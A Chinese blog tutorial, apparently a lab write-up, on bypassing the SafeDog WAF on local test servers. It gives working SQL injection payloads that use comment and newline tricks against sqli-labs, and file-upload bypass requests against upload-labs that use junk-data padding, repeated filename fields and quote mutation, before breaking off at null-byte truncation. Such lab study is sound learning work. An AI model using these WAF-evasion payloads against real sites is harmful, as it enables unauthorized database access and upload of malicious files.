渗透学习-靶场篇-安全狗的安装与绕过实验(后续还会更新)

已于 2022-09-26 21:52:20 修改
阅读量3.2k 收藏 47
点赞数 4
分类专栏: 渗透学习 文章标签: 学习 sql 安全
于 2022-07-22 15:54:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43696276/article/details/125929984
版权

提示:仅供进行学习使用,请勿做出非法的行为。如若由任何违法行为,将依据法律法规进行严惩!!!

文章目录

前言

在经过上一篇的sql、与文件上传的基础学习后,以下将正式进入靶场的学习与训练当中。本文以下将进行对WAF的绕过实验。但是经过下面的尝试后发现自己实力还是不够的!因此,我打算再搞完这个之后,我将再学习一段时间再来复盘!!!

一、安装安全狗

实验环境:Windows 10 + phpstudy(apache 2.4.39)+安全狗 apache v4.0版本

首先,打开phpstudy点击运行,方便安全狗能够自动检测到安装的插件路径,点击安全狗的安装程序,进行安装:
在这里插入图片描述
然后就会进入如下画面:
在这里插入图片描述

然后以管理员权限运行cmd,进入你的phpstudy文件夹下的Extensions\Apache2.4.39\bin目录里,然后输入如下命令:

httpd.exe -k install -n apache2.4.39

在这里插入图片描述
此时就可以在你的安装页面里的服务名上写入apache 2.4.39 然后点击确定即可安装成功。

二、sql注入的绕过实验

判断注入点

首先,将phpstudy运行起来,然后我们进入sqllibs的第一关,输入测试语句看看:
在这里插入图片描述好的成功了! 那么我们接下来进行测试!!!

由前面的尝试我们发现直接用and 1=1 是不太行的,这里可能是过滤了识别了and将其过滤了。那么我们一个个实验,看一下安全狗是怎么样识别并拦截的。这里我将and 1=1进行拆分:

http://192.168.10.129:8080/sqli/Less-1/?id=1' and --+
http://192.168.10.129:8080/sqli/Less-1/?id=1' 1=1 --+

发现上述两个页面都会返回sql语法错误的信息,因此说明了一件事情,即安全狗不会单独过滤掉and 或者1=1 。这里我就思考了下,感觉有可能是识别and以及查看and后是否有空格+字符这种形式,于是进行实验:

http://192.168.10.129:8080/sqli/Less-1/?id=1' and1--+
http://192.168.10.129:8080/sqli/Less-1/?id=1' and 1--+

实验结果,证实了确实是and+空格+字符串的格式会被拦截。

好的那么这里我们就可以开始尝试利用注释符等等来代替空格进行绕过了!!

在此输入:

http://192.168.10.129:8080/sqli/Less-1/?id=1' and/**/1=1--+

发现依旧不行,那么我们利用fuzz大法进行测试一下看看:
打开burp,拦截下我们阻截的包,然后点击发送到intrudermo模块,选择如下:

在这里插入图片描述然后,去到pyload,选择暴力破解:

在这里插入图片描述然后,点击attack,此时我们就可以看见就开始了暴力测试!由于安全狗有流量攻击的防御,因此后面可能会被禁止进入网站,emmm 这种情况要么等一会要么直接重启apache服务器就行了。好了这里测试完成了,我们拿每个长度试一下(因为这里学艺不精,我还不清楚怎么直接判断哪个可以成功…是我太菜了)。然后发现有一个长度下的测试是成功的:

在这里插入图片描述
然后,我们构造如下pyload:

http://192.168.10.129:8080/sqli/Less-1/?id=1’ and/*/!**/1–+

发现可以绕过了!!

在这里插入图片描述这里就可以判断有注入点了!

这里还可以使用内联注释符/!000001/ , payload:
http://192.168.10.129:8080/sqli/Less-1/?id=1’and/!000001/=/!000001/–+
在这里插入图片描述

判断列数量

这里我们可以使用之前的思路,利用/*/!**/这一个充当空格,然后看看能否成功?
在这里插入图片描述好的,很快我们就解决了这一部分的内容。接下来该是union联合注入了!

union联合注入

首先,我们尝试了直接使用普通的是不太行的,那么我们测试一下,安全狗对于联合注入的过滤规则:

http://192.168.10.129:8080/sqli/Less-1/?id=1'  unionselect --+

被拦截!那么输入:

http://192.168.10.129:8080/sqli/Less-1/?id=1' union --+

sql语句爆错,说明单独一个union是不拦截的,同理尝试了select也是一样的:
在这里插入图片描述
那么我们就已经知道了,安全狗这waf对于联合注入规则的拦截就是识别到unionselect这两个字符串一起后就拦截了!

那么按照之前思路,看看能否利用注释符进行绕过这种规则?
同样的方法,利用burp抓包,进行fuzz暴力破解看看:
这里测试了一下,emm都不太行,那么我们加强一下fuzz中间带的参数:

在这里插入图片描述终于发现这里有许多可以绕过的字符:
在这里插入图片描述随便选一个看看:

http://192.168.10.129:8080/sqli/Less-1/?id=1' union/*/!*!**/select 1,2,3 --+

在这里插入图片描述
成功了!!! 继续下一步!

除此之外,再提供一个思路,在基础篇中我们讲过,可以利用–+%0a这种格式通过换行继续执行,这里我们试一下看看:

http://192.168.10.129:8080/sqli/Less-1/?id=1' union/*!--+/*%0aselect 1,2,3*/ --+

在这里插入图片描述

拿库

好的,让我们输入一下database()看看:

http://192.168.10.129:8080/sqli/Less-1/?id=-1' union/*//--**/select 1,database(),3 --+

好家伙,这里把database也过滤了…

那么我们再试试具体过滤成什么样子:去掉database()的()后,我们输入发现这里爆了sql的错误,那么应该是将database()进行检测,然后我们继续使用注释符或者内联注释符看看吧:

继续采用burp的fuzz:添加上变量tu
然后设置:
在这里插入图片描述在这里插入图片描述貌似找到了,我们试试看:

http://192.168.10.129:8080/sqli/Less-1/?id=-1' union/*/!*!**/select 1,database/*/!//*/(),3 --+

在这里插入图片描述
成功了!
当然这里还可以使用内联注释,这里我就不再演示了,有兴趣的可以看我的参考博文的链接!

拿表

首先一个个试函数,首先输入group_concat(table_name):

在这里插入图片描述
没啥问题,接着往下走:输入 from

在这里插入图片描述
好了这里已经被拦截了。。。。 那我们试试看注释符吧:

http://192.168.10.129:8080/sqli/Less-1/?id=-1' union/*/!*!**/select 1,group_concat(table_name),3  from/*/!*!**/1 --+

在这里插入图片描述
好了,这里我们已经把from绕过了(如果不加 直接 from 1 会被拦截) ,然后这里我们继续下一步,因为也把informa这个也过滤了!

这里通过参考别人的博客,我了解到有一种方法即:内联注释的利用方法就是中间加注释符再加换行,也就是/!%23%0a/这种形式! 然后除此之外再注释符前还需要加上/*来构造/**/ 如下述payload:

?id=-1' union/*/!*!**/select%201,2,group_concat(table_name)from/*!-- /*%0ainformation_schema.tables*/ where table_schema='security'--+

成功了!!

然后既然表都可以拿到了,那么由于拿列和数据用的sql语句是差不多的,因此我们只需再上面payload进行修改即可!!

三、文件上传的绕过实验

首先,我们开启安全狗,然后先正常的进行上传一个文件试试看:(以upload-file 的第六关为例,因为安全狗貌似会直接拦截前两关)

在这里插入图片描述
从这里,我们可以看出来即使我们已经利用MIME type类型进行了绕过这里,依旧会被狗子拦截住的!一般来说我们主要思路就是防止安全狗进行匹配我们上传的数据!

那么,我们接下来就看看用什么方法进行绕过吧:

垃圾数据溢出1:
这里我们在基础部分也曾讲过。由于安全狗是采用正则匹配进行过滤的(如有错欢迎指出。。。)因此,若我们在数据包中塞入大量繁多的垃圾数据,就很有可能超出了安全狗的匹配检测能力,以此来达到绕过的手段!!!

注意哈,这里的垃圾数据可能会很长。我在一开始时候,自己以外塞了很多垃圾数据时却发现依旧无法绕过,一开始我还以为是这方法失效了。直到我看到别人塞了很多很多后确实可以绕过时,才发现自己确实弄错了。。。因此,这里记录一下,要记住这里的垃圾数据的塞入一定要很大量,尽量多塞一些进去,别只塞了一小部分就认为无法绕过了!!!

我们需要在Content-Disposition: form-data; 后面添上足够长的垃圾数据即可实现绕过,这里由于第六关还有着黑名单的限制,因此我们还需要将php利用大小写进行绕过

以下我将贴出数据包:

Content-Disposition: form-data; yuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuanyuan ; name="upload_file"; filename="test.Php"

实验结果如下图所示:
在这里插入图片描述

至此,可以看到我们以及实现了绕过!!!

垃圾数据溢出2:

我们除了在Content-Disposition: form-data; 后面添上足够长的垃圾数据外,也可以实现在文件名出注入大量的垃圾数据,已达到绕过
在这里插入图片描述

重复数据:
其实这一部分的绕过和前面的数据溢出的原理差不多吗,只是形式发生了变化,因此这里我就放在数据溢出之后一起进行绕过。。 这里我们在文件名前注入大量的正确的文件名,以此来绕过

Content-Disposition: form-data ; name="upload_file"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg";filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.jpg"; filename="test.Php"

在这里插入图片描述
符号变异:

由于安全狗进行匹配上传的文件名时通常是提取引号内的内容(这只是一种情况,具体如何提取的,就要看安全狗的开发者如何写的了!) 但是数据包对于文件名的匹配不依赖于引号的。因此,我们这里就可以利用符号变异,来逃逸安全狗的检测!!

直接对filename处对引号进行各种更改:

Content-Disposition: form-data ; name="upload_file"; filename= ""test.Php

在这里插入图片描述

我们可以访问以下这个文件看看:
在这里插入图片描述

okok很完美!!继续讲下一个绕过方法:

零字节截断:

与正式关卡中讲的步骤一致。下面直接贴图展示即可:
先写入:
在这里插入图片描述

然后url解码%00

